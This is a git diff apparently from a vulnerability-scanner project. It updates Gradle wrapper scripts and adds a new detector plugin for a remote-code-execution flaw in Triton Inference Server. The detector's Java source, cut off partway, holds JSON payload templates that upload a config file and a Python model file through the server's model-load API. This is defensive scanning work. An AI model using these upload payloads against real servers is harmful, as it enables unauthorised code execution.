directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/spring_framework_cve_2022_22965/gradlew.bat b/community/detectors/spring_framework_cve_2022_22965/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/spring_framework_cve_2022_22965/gradlew.bat +++ b/community/detectors/spring_framework_cve_2022_22965/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/strapi_cve_2023_22893/gradle/wrapper/gradle-wrapper.properties b/community/detectors/strapi_cve_2023_22893/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/community/detectors/strapi_cve_2023_22893/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/strapi_cve_2023_22893/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/community/detectors/triton_inference_server_model_overwrite/README.md b/community/detectors/triton_inference_server_model_overwrite/README.md new file mode 100644 index 000000000..3b6c0052f --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/README.md @@ -0,0 +1,21 @@ +# Triton Inference Server Rce Detector + +This detector checks triton inference server RCE with explicit model-control +option enabled. All versions of triton inference server with the +`--model-control explicit` option and at least one loaded model can be +overwritten by a malicious model and lead to RCE. As a recommendation don't use +`--model-control explicit` option with public access. + +Ref: + +- https://protectai.com/threat-research/triton-inference-server-arbitrary-file-overwrite + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/triton_inference_server_model_overwrite/build.gradle b/community/detectors/triton_inference_server_model_overwrite/build.gradle new file mode 100644 index 000000000..96f7b3f12 --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/build.gradle @@ -0,0 +1,69 @@ +plugins { + id 'java-library' +} + +description = 'Tsunami Triton Inference Server Rce Detector VulnDetector plugin.' +group = 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/en/java/javase/11/' + source = '11' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + okhttpVersion = '3.12.0' + truthVersion = '1.1.3' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + implementation 'com.google.code.gson:gson:2.10.1' + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" +} diff --git a/community/detectors/triton_inference_server_model_overwrite/gradle/wrapper/gradle-wrapper.jar b/community/detectors/triton_inference_server_model_overwrite/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..d64cd4917 Binary files /dev/null and b/community/detectors/triton_inference_server_model_overwrite/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/triton_inference_server_model_overwrite/gradle/wrapper/gradle-wrapper.properties b/community/detectors/triton_inference_server_model_overwrite/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/triton_inference_server_model_overwrite/gradlew b/community/detectors/triton_inference_server_model_overwrite/gradlew new file mode 100755 index 000000000..1aa94a426 --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/gradlew @@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/triton_inference_server_model_overwrite/gradlew.bat b/community/detectors/triton_inference_server_model_overwrite/gradlew.bat new file mode 100644 index 000000000..93e3f59f1 --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/gradlew.bat @@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/triton_inference_server_model_overwrite/settings.gradle b/community/detectors/triton_inference_server_model_overwrite/settings.gradle new file mode 100644 index 000000000..2506d8d59 --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'triton-inference-server-model-overwrite' diff --git a/community/detectors/triton_inference_server_model_overwrite/src/main/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceDetectorBootstrapModule.java b/community/detectors/triton_inference_server_model_overwrite/src/main/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceDetectorBootstrapModule.java new file mode 100644 index 000000000..eeab8dd11 --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/src/main/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceDetectorBootstrapModule.java @@ -0,0 +1,30 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** + * A Triton Inference Server Rce Detector Guice module that bootstraps the {@link + * TritonInferenceServerRceVulnDetector}. + */ +public final class TritonInferenceServerRceDetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(TritonInferenceServerRceVulnDetector.class); + } +} diff --git a/community/detectors/triton_inference_server_model_overwrite/src/main/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceVulnDetector.java b/community/detectors/triton_inference_server_model_overwrite/src/main/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceVulnDetector.java new file mode 100644 index 000000000..d7187f627 --- /dev/null +++ b/community/detectors/triton_inference_server_model_overwrite/src/main/java/com/google/tsunami/plugins/detectors/rce/TritonInferenceServerRceVulnDetector.java @@ -0,0 +1,303 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.rce; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.common.net.HttpHeaders.CONTENT_TYPE; +import static com.google.tsunami.common.data.NetworkServiceUtils.buildWebApplicationRootUrl; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import com.google.gson.JsonParser; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.ForWebService; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.NotImplementedException; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Instant; +import java.util.Base64; +import javax.inject.Inject; + +/** A {@link VulnDetector} that detects the triton inference server RCE vulnerability. */ +@ForWebService +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "TritonInferenceServerRceVulnDetector", + version = "0.1", + description = + "This detector checks triton inference server RCE with explicit model-control option" + + " enabled", + author = "secureness", + bootstrapModule = TritonInferenceServerRceDetectorBootstrapModule.class) +public class TritonInferenceServerRceVulnDetector implements VulnDetector { + + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + @VisibleForTesting + static final String UPLOAD_CONFIG_PAYLOAD = + "{\"parameters\":{\"config\" : \"{}\", \"file:config.pbtxt\" :\"%s\" }}"; + + @VisibleForTesting + static final String UPLOAD_MODEL_PAYLOAD = + "{\"parameters\":{\"config\" : \"{}\", \"file:1/model.py\" : \"%s\" }}"; + + private final PayloadGenerator payloadGenerator; + + @VisibleForTesting + static final String MODEL_CONFIG = + "\n" + + "name: \"%s\"\n" + + "backend: \"python\"\n" + + "\n" + + "input [\n" + + " {\n" + + " name: \"input__0\"\n" + + " data_type: TYPE_FP32\n" + + " dims: [ -1, 3 ]\n" + + " }\n" + + "]\n" + + "\n" + + "output [\n" + + " {\n" + + " name: \"output__0\"\n" + + " data_type: TYPE_FP32\n" + + " dims: [ -1, 1 ]\n" + + " }\n" + + "]\n" + + "\n" + + "instance_group [\n" + + " {\n" + + " count: 1\n" + + " kind: KIND_CPU\n" + + " }\n" + + "]\n" + + "\n" 